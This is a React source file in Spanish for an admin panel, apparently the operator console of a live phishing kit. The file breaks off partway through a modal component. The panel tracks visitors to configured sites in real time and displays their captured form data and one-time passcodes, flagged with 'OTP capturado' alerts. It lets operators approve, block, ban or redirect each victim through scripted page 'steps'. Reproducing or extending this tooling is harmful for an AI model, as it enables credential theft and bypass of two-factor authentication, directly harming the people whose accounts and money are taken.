import React, { useState, useEffect } from 'react';
import { io } from 'socket.io-client';
import axios from 'axios';

var API_URL = 'http://129.121.139.219/api';
var SOCKET_URL = 'http://129.121.139.219';

function App() {
    var [isLoggedIn, setIsLoggedIn] = useState(false);
    var [currentAdmin, setCurrentAdmin] = useState(null);
    var [loginData, setLoginData] = useState({ username: '', password: '' });
    var [loginError, setLoginError] = useState('');
    var [loginLoading, setLoginLoading] = useState(false);
    var [users, setUsers] = useState([]);
    var [sites, setSites] = useState([]);
    var [selectedUser, setSelectedUser] = useState(null);
    var [selectedSite, setSelectedSite] = useState('all');
    var [socket, setSocket] = useState(null);
    var [isConnected, setIsConnected] = useState(false);
    var [notifications, setNotifications] = useState([]);
    var [searchTerm, setSearchTerm] = useState('');
    var [showSiteModal, setShowSiteModal] = useState(false);
    var [editingSite, setEditingSite] = useState(null);
    var [showRedirectModal, setShowRedirectModal] = useState(false);
    var [redirectUser, setRedirectUser] = useState(null);
    var [showStepsModal, setShowStepsModal] = useState(false);
    var [stepsSite, setStepsSite] = useState(null);
    var [saving, setSaving] = useState(false);

    useEffect(() => {
        var token = localStorage.getItem('adminToken');
        var adminData = localStorage.getItem('adminData');
        if (token && adminData) {
            setIsLoggedIn(true);
            setCurrentAdmin(JSON.parse(adminData));
        }
    }, []);

    useEffect(() => {
        if (!isLoggedIn) return;

        var token = localStorage.getItem('adminToken');
        var newSocket = io(SOCKET_URL, {
            auth: { token: token, role: 'admin' },
            transports: ['websocket', 'polling']
        });

        newSocket.on('connect', function() {
            setIsConnected(true);
            newSocket.emit('getActiveUsers');
            newSocket.emit('getSitesList');
        });

        newSocket.on('disconnect', function() { setIsConnected(false); });

        newSocket.on('activeUsers', function(data) { setUsers(data || []); });
        newSocket.on('sitesList', function(data) { setSites(data || []); });

        newSocket.on('userConnected', function(data) {
            setUsers(function(prev) {
                var exists = prev.find(function(u) { return u.sessionId === data.sessionId; });
                if (exists) return prev.map(function(u) { return u.sessionId === data.sessionId ? Object.assign({}, u, data) : u; });
                return prev.concat([data]);
            });
            addNotification('Nuevo usuario: ' + (data.ip || 'Desconocido'));
        });

        newSocket.on('userDisconnected', function(data) {
            setUsers(function(prev) { return prev.filter(function(u) { return u.sessionId !== data.sessionId; }); });
            setSelectedUser(function(prev) { return prev && prev.sessionId === data.sessionId ? null : prev; });
        });

        newSocket.on('pageUpdate', function(data) {
            setUsers(function(prev) {
                return prev.map(function(u) {
                    return u.sessionId === data.sessionId ? Object.assign({}, u, { currentPage: data.page }) : u;
                });
            });
            setSelectedUser(function(prev) {
                return prev && prev.sessionId === data.sessionId ? Object.assign({}, prev, { currentPage: data.page }) : prev;
            });
        });

        newSocket.on('formEvent', function(data) {
            setUsers(function(prev) {
                return prev.map(function(u) {
                    if (u.sessionId === data.sessionId) {
                        return Object.assign({}, u, {
                            formProgress: data.formProgress,
                            formData: data.formData || u.formData || {}
                        });
                    }
                    return u;
                });
            });
            setSelectedUser(function(prev) {
                if (prev && prev.sessionId === data.sessionId) {
                    return Object.assign({}, prev, {
                        formProgress: data.formProgress,
                        formData: data.formData || prev.formData || {}
                    });
                }
                return prev;
            });
        });

        newSocket.on('verificationUpdate', function(data) {
            setUsers(function(prev) {
                return prev.map(function(u) {
                    return u.sessionId === data.sessionId ? Object.assign({}, u, { verification: data }) : u;
                });
            });
            setSelectedUser(function(prev) {
                return prev && prev.sessionId === data.sessionId ? Object.assign({}, prev, { verification: data }) : prev;
            });
            if (data.code) addNotification('OTP capturado: ' + data.code);
        });

        newSocket.on('sitesUpdated', function() {
            console.log('Sites updated event');
            loadSites();
        });

        setSocket(newSocket);

        return function() { newSocket.close(); };
    }, [isLoggedIn]);

    var loadSites = function() {
        var token = localStorage.getItem('adminToken');
        axios.get(API_URL + '/sites', { headers: { Authorization: 'Bearer ' + token } })
            .then(function(res) {
                if (res.data.success) {
                    console.log('Sitios cargados:', res.data.data.length);
                    setSites(res.data.data);
                }
            })
            .catch(function(err) { console.error('Error loading sites:', err); });
    };

    var handleLogin = async function(e) {
        e.preventDefault();
        setLoginLoading(true);
        setLoginError('');

        try {
            var response = await axios.post(API_URL + '/auth/login', loginData);
            if (response.data.success) {
                var token = response.data.data.token;
                var admin = response.data.data.admin;
                localStorage.setItem('adminToken', token);
                localStorage.setItem('adminData', JSON.stringify(admin));
                setCurrentAdmin(admin);
                setIsLoggedIn(true);
            }
        } catch (error) {
            setLoginError(error.response && error.response.data ? error.response.data.message : 'Error al iniciar sesion');
        } finally {
            setLoginLoading(false);
        }
    };

    var handleLogout = function() {
        localStorage.removeItem('adminToken');
        localStorage.removeItem('adminData');
        setIsLoggedIn(false);
        setCurrentAdmin(null);
        setUsers([]);
        if (socket) socket.disconnect();
        setSocket(null);
    };

    var addNotification = function(message) {
        var notification = { id: Date.now(), message: message, timestamp: new Date().toLocaleTimeString() };
        setNotifications(function(prev) { return [notification].concat(prev).slice(0, 10); });
        setTimeout(function() {
            setNotifications(function(prev) { return prev.filter(function(n) { return n.id !== notification.id; }); });
        }, 5000);
    };

    var filteredUsers = users.filter(function(user) {
        if (selectedSite !== 'all' && user.siteId !== selectedSite) return false;
        if (searchTerm) {
            var term = searchTerm.toLowerCase();
            return (
                (user.ip && user.ip.indexOf(term) !== -1) ||
                (user.sessionId && user.sessionId.indexOf(term) !== -1) ||
                (user.currentPage && user.currentPage.toLowerCase().indexOf(term) !== -1)
            );
        }
        return true;
    });

    var isSuperadmin = currentAdmin && currentAdmin.role === 'superadmin';

    var handleUserAction = function(action, user) {
        if (!socket) return;
        
        if (action === 'approve') {
            socket.emit('adminCommand', { sessionId: user.sessionId, command: 'showMessage', message: 'Acceso aprobado' });
            addNotification('Usuario aprobado: ' + user.ip);
        } else if (action === 'reject') {
            socket.emit('adminCommand', { sessionId: user.sessionId, command: 'blockPage', message: 'Acceso denegado' });
            addNotification('Usuario rechazado: ' + user.ip);
        } else if (action === 'redirect') {
            setRedirectUser(user);
            setShowRedirectModal(true);
        } else if (action === 'ban') {
            if (confirm('Banear IP ' + user.ip + '?')) {
                socket.emit('banUser', { sessionId: user.sessionId, ip: user.ip, reason: 'Baneado por admin' });
                addNotification('IP baneada: ' + user.ip);
            }
        }
    };

    var executeRedirect = function(step) {
        if (!redirectUser || !socket) return;
        
        socket.emit('adminCommand', {
            sessionId: redirectUser.sessionId,
            command: 'redirect',
            stepId: step.stepId,
            url: step.url
        });
        
        addNotification('Redirigiendo ' + redirectUser.ip + ' a ' + step.name);
        setShowRedirectModal(false);
        setRedirectUser(null);
    };

    var executeRedirectUrl = function(url) {
        if (!redirectUser || !socket) return;
        
        if (url.indexOf('http://') !== 0 && url.indexOf('https://') !== 0) {
            url = 'http://' + url;
        }
        
        socket.emit('adminCommand', {
            sessionId: redirectUser.sessionId,
            command: 'redirect',
            url: url
        });
        
        addNotification('Redirigiendo ' + redirectUser.ip);
        setShowRedirectModal(false);
        setRedirectUser(null);
    };

    var saveSite = async function(siteData) {
        setSaving(true);
        var token = localStorage.getItem('adminToken');
        
        try {
            var response;
            if (editingSite) {
                response = await axios.put(
                    API_URL + '/sites/' + editingSite.siteId,
                    siteData,
                    { headers: { Authorization: 'Bearer ' + token } }
                );
            } else {
                response = await axios.post(
                    API_URL + '/sites',
                    siteData,
                    { headers: { Authorization: 'Bearer ' + token } }
                );
            }
            
            if (response.data.success) {
                addNotification(editingSite ? 'Sitio actualizado' : 'Sitio creado');
                setShowSiteModal(false);
                setEditingSite(null);
                loadSites();
            }
        } catch (error) {
            alert('Error: ' + (error.response && error.response.data ? error.response.data.message : error.message));
        } finally {
            setSaving(false);
        }
    };

    var saveSteps = async function(siteId, steps) {
        setSaving(true);
        var token = localStorage.getItem('adminToken');
        
        try {
            var response = await axios.put(
                API_URL + '/sites/' + siteId + '/steps',
                { steps: steps },
                { headers: { Authorization: 'Bearer ' + token } }
            );
            
            if (response.data.success) {
                addNotification('Pasos actualizados');
                setShowStepsModal(false);
                setStepsSite(null);
                loadSites();
            }
        } catch (error) {
            alert('Error: ' + (error.response && error.response.data ? error.response.data.message : error.message));
        } finally {
            setSaving(false);
        }
    };

    var deleteSite = async function(siteId) {
        if (!confirm('Eliminar sitio ' + siteId + '?')) return;
        
        var token = localStorage.getItem('adminToken');
        try {
            await axios.delete(API_URL + '/sites/' + siteId, {
                headers: { Authorization: 'Bearer ' + token }
            });
            addNotification('Sitio eliminado');
            loadSites();
        } catch (error) {
            alert('Error al eliminar');
        }
    };

    var formatTime = function(timestamp) {
        if (!timestamp) return 'N/A';
        return new Date(timestamp).toLocaleTimeString();
    };

    // ==================== ESTILOS ====================
    var styles = {
        loginContainer: { display: 'flex', justifyContent: 'center', alignItems: 'center', height: '100vh', backgroundColor: '#1a1a2e', fontFamily: 'Arial, sans-serif' },
        loginBox: { backgroundColor: '#16213e', padding: '40px', borderRadius: '10px', width: '400px', boxShadow: '0 10px 30px rgba(0,0,0,0.5)' },
        loginTitle: { color: '#2196f3', textAlign: 'center', marginBottom: '30px', fontSize: '24px', fontWeight: 'bold' },
        loginInput: { width: '100%', padding: '12px', margin: '10px 0', borderRadius: '5px', border: '1px solid #333', backgroundColor: '#1e1e2e', color: 'white', fontSize: '16px', boxSizing: 'border-box' },
        loginButton: { width: '100%', padding: '12px', margin: '20px 0 10px 0', borderRadius: '5px', border: 'none', backgroundColor: '#2196f3', color: 'white', fontSize: '16px', fontWeight: 'bold', cursor: 'pointer' },
        container: { display: 'flex', height: '100vh', backgroundColor: '#1a1a2e', color: 'white', fontFamily: 'Arial, sans-serif' },
        sidebar: { width: '280px', backgroundColor: '#16213e', padding: '20px', borderRight: '1px solid #333', overflowY: 'auto', flexShrink: 0 },
        main: { flex: 1, display: 'flex', flexDirection: 'column', padding: '20px', overflow: 'hidden' },
        userList: { flex: 1, overflowY: 'auto', padding: '10px' },
        userCard: { backgroundColor: '#1e1e2e', padding: '15px', marginBottom: '10px', borderRadius: '8px', cursor: 'pointer', border: '1px solid #333' },
        userCardSelected: { backgroundColor: '#1a2a3e', padding: '15px', marginBottom: '10px', borderRadius: '8px', cursor: 'pointer', border: '2px solid #2196f3' },
        button: { padding: '6px 12px', margin: '0 3px', border: 'none', borderRadius: '4px', cursor: 'pointer', color: 'white', fontWeight: 'bold', fontSize: '11px' },
        input: { padding: '10px', borderRadius: '4px', border: '1px solid #333', backgroundColor: '#1e1e2e', color: 'white', width: '100%', marginBottom: '10px', boxSizing: 'border-box' },
        select: { padding: '10px', borderRadius: '4px', border: '1px solid #333', backgroundColor: '#1e1e2e', color: 'white', width: '100%', marginBottom: '10px' },
        badge: { padding: '3px 8px', borderRadius: '3px', fontSize: '11px', marginLeft: '8px', display: 'inline-block' },
        notification: { position: 'fixed', top: '20px', right: '20px', backgroundColor: '#2196f3', color: 'white', padding: '15px 20px', borderRadius: '5px', zIndex: 1000, boxShadow: '0 4px 15px rgba(0,0,0,0.5)', minWidth: '250px' },
        detailPanel: { width: '400px', backgroundColor: '#16213e', padding: '20px', borderLeft: '1px solid #333', overflowY: 'auto', flexShrink: 0 },
        otpDisplay: { fontSize: '36px', fontWeight: 'bold', letterSpacing: '8px', color: '#ff9800', textAlign: 'center', padding: '20px', backgroundColor: '#1e1e2e', borderRadius: '8px', fontFamily: 'monospace' },
        statusDot: { width: '10px', height: '10px', borderRadius: '50%', display: 'inline-block', marginRight: '5px' },
        infoRow: { display: 'flex', justifyContent: 'space-between', padding: '8px 0', borderBottom: '1px solid #333' },
        infoLabel: { color: '#999', fontSize: '13px' },
        infoValue: { color: 'white', fontSize: '13px', fontWeight: 'bold', textAlign: 'right', maxWidth: '60%', wordBreak: 'break-all' },
        sectionTitle: { color: '#2196f3', marginBottom: '10px', fontSize: '14px', fontWeight: 'bold', textTransform: 'uppercase', letterSpacing: '1px' },
        modalOverlay: { position: 'fixed', top: 0, left: 0, right: 0, bottom: 0, backgroundColor: 'rgba(0,0,0,0.7)', display: 'flex', justifyContent: 'center', alignItems: 'center', zIndex: 2000 },
        modal: { backgroundColor: '#16213e', padding: '30px', borderRadius: '10px', width: '600px', maxWidth: '90%', maxHeight: '85vh', overflowY: 'auto' },
        stepButton: { display: 'block', width: '100%', padding: '15px', margin: '10px 0', backgroundColor: '#1e1e2e', color: 'white', border: '1px solid #2196f3', borderRadius: '5px', cursor: 'pointer', textAlign: 'left', fontSize: '14px' },
        label: { display: 'block', color: '#999', fontSize: '12px', marginTop: '10px', marginBottom: '5px' },
        stepRow: { display: 'flex', gap: '5px', marginBottom: '10px', alignItems: 'center' },
        smallInput: { padding: '8px', borderRadius: '4px', border: '1px solid #333', backgroundColor: '#1e1e2e', color: 'white', fontSize: '13px', boxSizing: 'border-box' }
    };

    // ==================== RENDER ====================

    if (!isLoggedIn) {
        return (
            <div style={styles.loginContainer}>
                <div style={styles.loginBox}>
                    <div style={styles.loginTitle}>Panel Admin</div>
                    {loginError && (
                        <div style={{ backgroundColor: '#f44336', color: 'white', padding: '10px', borderRadius: '5px', marginBottom: '15px', textAlign: 'center' }}>{loginError}</div>
                    )}
                    <form onSubmit={handleLogin}>
                        <input style={styles.loginInput} type="text" placeholder="Usuario" value={loginData.username} onChange={function(e) { setLoginData(Object.assign({}, loginData, { username: e.target.value })); }} required />
                        <input style={styles.loginInput} type="password" placeholder="Contrasena" value={loginData.password} onChange={function(e) { setLoginData(Object.assign({}, loginData, { password: e.target.value })); }} required />
                        <button style={Object.assign({}, styles.loginButton, { opacity: loginLoading ? 0.7 : 1 })} type="submit" disabled={loginLoading}>
                            {loginLoading ? 'Iniciando sesion...' : 'Iniciar Sesion'}
                        </button>
                    </form>
                </div>
            </div>
        );
    }

    return (
        <div style={styles.container}>
            <div style={{ position: 'fixed', top: 20, right: 20, zIndex: 3000 }}>
                {notifications.map(function(notification) {
                    return (
                        <div key={notification.id} style={styles.notification}>
                            <div style={{ fontWeight: 'bold' }}>{notification.message}</div>
                            <small>{notification.timestamp}</small>
                        </div>
                    );
                })}
            </div>

            {/* MODAL: Redireccion */}
            {showRedirectModal && redirectUser && (
                <div style={styles.modalOverlay} onClick={function() { setShowRedirectModal(false); }}>
                    <div style={styles.modal} onClick={function(e) { e.stopPropagation(); }}>
                        <h2 style={{ color: '#2196f3', marginTop: 0 }}>Redirigir Usuario</h2>
                        <p style={{ color: '#999' }}>Usuario: <strong>{redirectUser.ip}</strong> | Sitio: <strong>{redirectUser.siteId}</strong></p>
                        
                        <h3 style={{ color: '#4caf50', marginTop: '20px' }}>Seleccionar Paso:</h3>
                        
                        {sites.find(function(s) { return s.siteId === redirectUser.siteId; }) ? (
                            (function() {
                                var site = sites.find(function(s) { return s.siteId === redirectUser.siteId; });
                                if (site.steps && site.steps.length > 0) {
                                    return site.steps.slice().sort(function(a, b) { return a.order - b.order; }).map(function(step) {
                                        return (
                                            <button key={step.stepId} style={styles.stepButton}
                                                onClick={function() { executeRedirect(step); }}>
                                                <strong>{step.order}. {step.name}</strong>
                                                <br />
                                                <small style={{ color: '#666' }}>ID: {step.stepId}</small>
                                            </button>
                                        );
                                    });
                                }
                                return <p style={{ color: '#ff9800', padding: '20px', textAlign: 'center', backgroundColor: '#1e1e2e', borderRadius: '5px' }}>Este sitio no tiene pasos configurados. Ve a "Editar Sitios" para agregar pasos.</p>;
                            })()
                        ) : (
                            <p style={{ color: '#999' }}>Cargando sitio...</p>
                        )}
                        
                        <h3 style={{ color: '#ff9800', marginTop: '20px' }}>O URL Personalizada:</h3>
                        <input style={styles.input} type="text" placeholder="ej: google.com" 
                            onKeyPress={function(e) {
                                if (e.key === 'Enter' && e.target.value) {
                                    executeRedirectUrl(e.target.value);
                                }
                            }} />
                        <small style={{ color: '#666' }}>Presiona Enter para redirigir</small>
                        
                        <button style={Object.assign({}, styles.button, { backgroundColor: '#666', marginTop: '20px', padding: '10px 20px' })}
                            onClick={function() { setShowRedirectModal(false); }}>
                            Cancelar
                        </button>
                    </div>
                </div>
            )}

            {/* MODAL: Crear/Editar Sitio */}
            {showSiteModal && (
                <SiteModal 
                    site={editingSite} 
                    onClose={function() { setShowSiteModal(false); setEditingSite(null); }}
                    onSave={saveSite}
                    saving={saving}
                    styles={styles}
                />
            )}

            {/* MODAL: Gestionar Pasos */}
            {showStepsModal && stepsSite && (
                <StepsModal
                    site={stepsSite}
                    onClose={function() { setShowStepsModal(false); setStepsSite(null); }}
                    onSave={saveSteps}
                    saving={saving}
                    styles={styles}
                />
            )}

            {/* SIDEBAR */}
            <div style={styles.sidebar}>
                <h2 style={{ color: '#2196f3', marginBottom: '20px' }}>Panel Admin</h2>
                
                <div style={{ marginBottom: '20px', color: '#999', fontSize: '12px' }}>
                    <span style={Object.assign({}, styles.statusDot, { backgroundColor: isConnected ? '#4caf50' : '#f44336' })} />
                    {isConnected ? 'Conectado' : 'Desconectado'}
                </div>

                {currentAdmin && (
                    <div style={{ marginBottom: '20px', padding: '10px', backgroundColor: '#1e1e2e', borderRadius: '5px' }}>
                        <div style={{ fontSize: '12px', color: '#999' }}>Conectado como:</div>
                        <div style={{ fontWeight: 'bold', fontSize: '14px' }}>{currentAdmin.username}</div>
                        <div style={{ fontSize: '11px', color: currentAdmin.role === 'superadmin' ? '#4caf50' : '#ff9800', marginTop: '3px' }}>
                            {currentAdmin.role === 'superadmin' ? 'SUPERADMIN' : 'MODERADOR'}
                        </div>
                    </div>
                )}

                <div style={{ marginBottom: '20px' }}>
                    <label style={{ color: '#999', fontSize: '12px' }}>Filtrar por sitio:</label>
                    <select style={styles.select} value={selectedSite} onChange={function(e) { setSelectedSite(e.target.value); }}>
                        <option value="all">Todos los sitios</option>
                        {sites.map(function(site) {
                            return <option key={site.siteId} value={site.siteId}>{site.name}</option>;
                        })}
                    </select>
                </div>

                <div style={{ marginBottom: '20px' }}>
                    <label style={{ color: '#999', fontSize: '12px' }}>Buscar usuario:</label>
                    <input style={styles.input} type="text" placeholder="IP, pagina..." value={searchTerm} onChange={function(e) { setSearchTerm(e.target.value); }} />
                </div>

                <div style={{ color: '#999', fontSize: '12px', marginBottom: '10px' }}>
                    Usuarios activos: {filteredUsers.length}
                </div>

                <button style={Object.assign({}, styles.button, { backgroundColor: '#4caf50', width: '100%', marginTop: '10px', padding: '10px' })}
                    onClick={function() { socket && socket.emit('getActiveUsers'); }}>
                    Actualizar Lista
                </button>

                {isSuperadmin && (
                    <div style={{ marginTop: '20px', paddingTop: '20px', borderTop: '1px solid #333' }}>
                        <div style={{ color: '#9c27b0', fontSize: '11px', fontWeight: 'bold', marginBottom: '10px' }}>ADMINISTRACION</div>
                        
                        <button style={Object.assign({}, styles.button, { backgroundColor: '#9c27b0', width: '100%', marginTop: '10px', padding: '10px' })}
                            onClick={function() { setEditingSite(null); setShowSiteModal(true); }}>
                            + Crear Nuevo Sitio
                        </button>

                        {sites.length > 0 && (
                            <div style={{ marginTop: '15px' }}>
                                <div style={{ color: '#666', fontSize: '11px', marginBottom: '5px' }}>Sitios existentes:</div>
                                {sites.map(function(site) {
                                    return (
                                        <div key={site.siteId} style={{ padding: '8px', backgroundColor: '#1e1e2e', borderRadius: '5px', marginBottom: '5px', fontSize: '12px' }}>
                                            <div style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center', marginBottom: '5px' }}>
                                                <strong>{site.name}</strong>
                                                <span style={{ color: '#666', fontSize: '10px' }}>{site.steps ? site.steps.length : 0} pasos</span>
                                            </div>
                                            <div style={{ display: 'flex', gap: '3px' }}>
                                                <button style={Object.assign({}, styles.button, { backgroundColor: '#2196f3', fontSize: '10px', padding: '4px 8px' })}
                                                    onClick={function() { setStepsSite(site); setShowStepsModal(true); }}>
                                                    Pasos
                                                </button>
                                                <button style={Object.assign({}, styles.button, { backgroundColor: '#ff9800', fontSize: '10px', padding: '4px 8px' })}
                                                    onClick={function() { setEditingSite(site); setShowSiteModal(true); }}>
                                                    Editar
                                                </button>
                                                <button style={Object.assign({}, styles.button, { backgroundColor: '#f44336', fontSize: '10px', padding: '4px 8px' })}
                                                    onClick={function() { deleteSite(site.siteId); }}>
                                                    Borrar
                                                </button>
                                            </div>
                                        </div>
                                    );
                                })}
                            </div>
                        )}
                    </div>
                )}

                <button style={Object.assign({}, styles.button, { backgroundColor: '#f44336', width: '100%', marginTop: '20px', padding: '10px' })}
                    onClick={handleLogout}>
                    Cerrar Sesion
                </button>
            </div>

            {/* MAIN */}
            <div style={styles.main}>
                <div style={{ marginBottom: '20px' }}>
                    <h1 style={{ margin: 0 }}>Usuarios Activos</h1>
                </div>

                <div style={styles.userList}>
                    {filteredUsers.length === 0 ? (
                        <div style={{ textAlign: 'center', color: '#666', marginTop: '50px', padding: '50px', backgroundColor: '#1e1e2e', borderRadius: '10px' }}>
                            <h3>No hay usuarios activos</h3>
                            <p>Esperando conexiones...</p>
                        </div>
                    ) : (
                        filteredUsers.map(function(user) {
                            return (
                                <div key={user.sessionId} style={selectedUser && selectedUser.sessionId === user.sessionId ? styles.userCardSelected : styles.userCard}
                                    onClick={function() { setSelectedUser(user); }}>
                                    <div style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center' }}>
                                        <div>
                                            <strong style={{ fontSize: '14px' }}>{user.ip || 'IP desconocida'}</strong>
                                            <span style={Object.assign({}, styles.badge, { backgroundColor: '#4caf50' })}>{user.status || 'active'}</span>
                                        </div>
                                        <small style={{ color: '#666' }}>{user.siteId || 'Sitio desconocido'}</small>
                                    </div>
                                    <div style={{ marginTop: '8px', color: '#999', fontSize: '12px' }}>
                                        <div>Pagina: <strong style={{ color: '#2196f3' }}>{user.currentPage || 'N/A'}</strong></div>
                                        {user.verification && user.verification.code && (
                                            <div style={{ marginTop: '5px' }}>OTP: <strong style={{ color: '#ff9800', letterSpacing: '3px' }}>{user.verification.code}</strong></div>
                                        )}
                                    </div>
                                    <div style={{ marginTop: '10px', display: 'flex', flexWrap: 'wrap', gap: '5px' }}>
                                        <button style={Object.assign({}, styles.button, { backgroundColor: '#4caf50' })}
                                            onClick={function(e) { e.stopPropagation(); handleUserAction('approve', user); }}>Aprobar</button>
                                        <button style={Object.assign({}, styles.button, { backgroundColor: '#f44336' })}
                                            onClick={function(e) { e.stopPropagation(); handleUserAction('reject', user); }}>Rechazar</button>
                                        <button style={Object.assign({}, styles.button, { backgroundColor: '#2196f3' })}
                                            onClick={function(e) { e.stopPropagation(); handleUserAction('redirect', user); }}>Redirigir</button>
                                        <button style={Object.assign({}, styles.button, { backgroundColor: '#ff9800' })}
                                            onClick={function(e) { e.stopPropagation(); handleUserAction('ban', user); }}>Banear</button>
                                    </div>
                                </div>
                            );
                        })
                    )}
                </div>
            </div>

            {/* PANEL DE DETALLE */}
            {selectedUser && (
                <div style={styles.detailPanel}>
                    <div style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center', marginBottom: '20px' }}>
                        <h3 style={{ margin: 0 }}>Detalles del Usuario</h3>
                        <button style={Object.assign({}, styles.button, { backgroundColor: '#666', fontSize: '14px' })}
                            onClick={function() { setSelectedUser(null); }}>X</button>
                    </div>

                    <div style={{ marginBottom: '20px' }}>
                        <div style={styles.sectionTitle}>Informacion</div>
                        <div style={styles.infoRow}><span style={styles.infoLabel}>IP:</span><span style={styles.infoValue}>{selectedUser.ip || 'N/A'}</span></div>
                        <div style={styles.infoRow}><span style={styles.infoLabel}>Sitio:</span><span style={styles.infoValue}>{selectedUser.siteId || 'N/A'}</span></div>
                        <div style={styles.infoRow}><span style={styles.infoLabel}>Pagina:</span><span style={styles.infoValue}>{selectedUser.currentPage || 'N/A'}</span></div>
                        <div style={styles.infoRow}><span style={styles.infoLabel}>Estado:</span><span style={styles.infoValue}>{selectedUser.status || 'N/A'}</span></div>
                        <div style={styles.infoRow}><span style={styles.infoLabel}>Conectado:</span><span style={styles.infoValue}>{formatTime(selectedUser.connectedAt)}</span></div>
                        <div style={styles.infoRow}><span style={styles.infoLabel}>User-Agent:</span><span style={styles.infoValue}>{selectedUser.userAgent || 'N/A'}</span></div>
                        <div style={styles.infoRow}><span style={styles.infoLabel}>Pantalla:</span><span style={styles.infoValue}>{selectedUser.screenResolution || 'N/A'}</span></div>
                        <div style={styles.infoRow}><span style={styles.infoLabel}>Idioma:</span><span style={styles.infoValue}>{selectedUser.language || 'N/A'}</span></div>
                    </div>

                    {selectedUser.formData && Object.keys(selectedUser.formData).length > 0 && (
                        <div style={{ marginBottom: '20px' }}>
                            <div style={styles.sectionTitle}>Datos del Formulario</div>
                            {Object.entries(selectedUser.formData).map(function(entry) {
                                return (
                                    <div style={styles.infoRow} key={entry[0]}>
                                        <span style={styles.infoLabel}>{entry[0]}:</span>
                                        <span style={styles.infoValue}>{entry[1] || 'Vacio'}</span>
                                    </div>
                                );
                            })}
                        </div>
                    )}

                    {selectedUser.verification && selectedUser.verification.code && (
                        <div style={{ marginBottom: '20px' }}>
                            <div style={styles.sectionTitle}>OTP Capturado</div>
                            <div style={styles.otpDisplay}>{selectedUser.verification.code}</div>
                        </div>
                    )}
                </div>
            )}
        </div>
    );
}

// ==================== COMPONENTE: Modal de Sitio ====================
function SiteModal(props) {
    var site = props.site;
    var styles = props.styles;
    
    var [formData, setFormData] = useState({
        siteId: site ? site.siteId : '',
        name: site ? site.name : '',
        url: site ? site.url : '',
        description: site ? site.description : '',
        status: site ? site.status : 'active'
    });

    var handleSubmit = function(e) {
        e.preventDefault();
        if (!formData.siteId || !formData.name || !formData.url) {
            alert('siteId, nombre y URL son requeridos');
            return;
        }
        props.onSave(formData);
    };

    return (
        <div style={styles.modalOverlay} onClick={props.onClose}>
            <div style={styles.modal} onClick={function(e) { e.stopPropagation(); }}>
                <h2 style={{ color: '#2196f3', marginTop: 0 }}>
                    {site ? 'Editar Sitio' : 'Crear Nuevo Sitio'}
                </h2>
                
                <form onSubmit={handleSubmit}>
                    <label style={styles.label}>Site ID (identificador unico):</label>
                    <input style={styles.input} type="text" 
                        value={formData.siteId}
                        onChange={function(e) { setFormData(Object.assign({}, formData, { siteId: e.target.value.toLowerCase().replace(/[^a-z0-9-]/g, '') })); }}
                        placeholder="ej: mi-tienda"
                        disabled={!!site}
                        required />
                    
                    <label style={styles.label}>Nombre:</label>
                    <input style={styles.input} type="text"
                        value={formData.name}
                        onChange={function(e) { setFormData(Object.assign({}, formData, { name: e.target.value })); }}
                        placeholder="ej: Mi Tienda Online"
                        required />
                    
                    <label style={styles.label}>URL:</label>
                    <input style={styles.input} type="text"
                        value={formData.url}
                        onChange={function(e) { setFormData(Object.assign({}, formData, { url: e.target.value })); }}
                        placeholder="ej: http://misitio.com"
                        required />
                    
                    <label style={styles.label}>Descripcion (opcional):</label>
                    <input style={styles.input} type="text"
                        value={formData.description}
                        onChange={function(e) { setFormData(Object.assign({}, formData, { description: e.target.value })); }}
                        placeholder="Descripcion del sitio" />
                    
                    <label style={styles.label}>Estado:</label>
                    <select style={styles.select}
                        value={formData.status}
                        onChange={function(e) { setFormData(Object.assign({}, formData, { status: e.target.value })); }}>
                        <option value="active">Activo</option>
                        <option value="inactive">Inactivo</option>
                    </select>
                    
                    <div style={{ marginTop: '20px', display: 'flex', gap: '10px' }}>
                        <button type="submit" style={Object.assign({}, styles.button, { backgroundColor: '#4caf50', padding: '12px 24px', fontSize: '14px' })}
                            disabled={props.saving}>
                            {props.saving ? 'Guardando...' : (site ? 'Actualizar' : 'Crear Sitio')}
                        </button>
                        <button type="button" style={Object.assign({}, styles.button, { backgroundColor: '#666', padding: '12px 24px', fontSize: '14px' })}
                            onClick={props.onClose}>
                            Cancelar
                        </button>
                    </div>
                </form>
            </div>
        </div>
    );
}

// ==================== COMPONENTE: Modal de Pasos ====================
function StepsModal(props) {
    var site = props.site;
    var styles = props.styles;
    
    var [steps, setSteps] = useState(site.steps ? JSON.parse(JSON.stringify(site.steps)) : []);

    var addStep = function() {
        var newStep = {
            stepId: '',
            name: '',
            url: '',
            order: steps.length + 1,
            description: ''
        };
        setSteps(steps.concat([newStep]));
    };

    var updateStep = function(index, field, value) {
        var newSteps = steps.slice();
        newSteps[index] = Object.assign({}, newSteps[index]);
        newSteps[index][field] = value;
        setSteps(newSteps);
    };

    var removeStep = function(index) {
        if (!confirm('Eliminar este paso?')) return;
        var newSteps = steps.filter(function(_, i) { return i !== index; });
        setSteps(newSteps);
    };

    var moveStep = function(index, direction) {
        var newSteps = steps.slice();
        var newIndex = index + direction;
        if (newIndex < 0 || newIndex >= newSteps.length) return;
        
        var temp = newSteps[index];
        newSteps[index] = newSteps[newIndex];
        newSteps[newIndex] = temp;
        
        // Actualizar orden
        newSteps = newSteps.map(function(step, i) {
            return Object.assign({}, step, { order: i + 1 });
        });
        
        setSteps(newSteps);
    };

    var handleSave = function() {
        // Validar
        for (var i = 0; i < steps.length; i++) {
            if (!steps[i].stepId || !steps[i].name || !steps[i].url) {
                alert('Todos los pasos deben tener ID, nombre y URL');
                return;
            }
        }
        props.onSave(site.siteId, steps);
    };

    return (
        <div style={styles.modalOverlay} onClick={props.onClose}>
            <div style={styles.modal} onClick={function(e) { e.stopPropagation(); }}>
                <h2 style={{ color: '#2196f3', marginTop: 0 }}>
                    Pasos de: {site.name}
                </h2>
                <p style={{ color: '#999', fontSize: '12px' }}>
                    Configura los pasos del sitio para que los moderadores puedan redirigir usuarios facilmente.
                </p>
                
                {steps.length === 0 ? (
                    <div style={{ padding: '30px', textAlign: 'center', backgroundColor: '#1e1e2e', borderRadius: '5px', color: '#666' }}>
                        No hay pasos configurados
                    </div>
                ) : (
                    steps.map(function(step, index) {
                        return (
                            <div key={index} style={{ padding: '15px', backgroundColor: '#1e1e2e', borderRadius: '5px', marginBottom: '10px', border: '1px solid #333' }}>
                                <div style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center', marginBottom: '10px' }}>
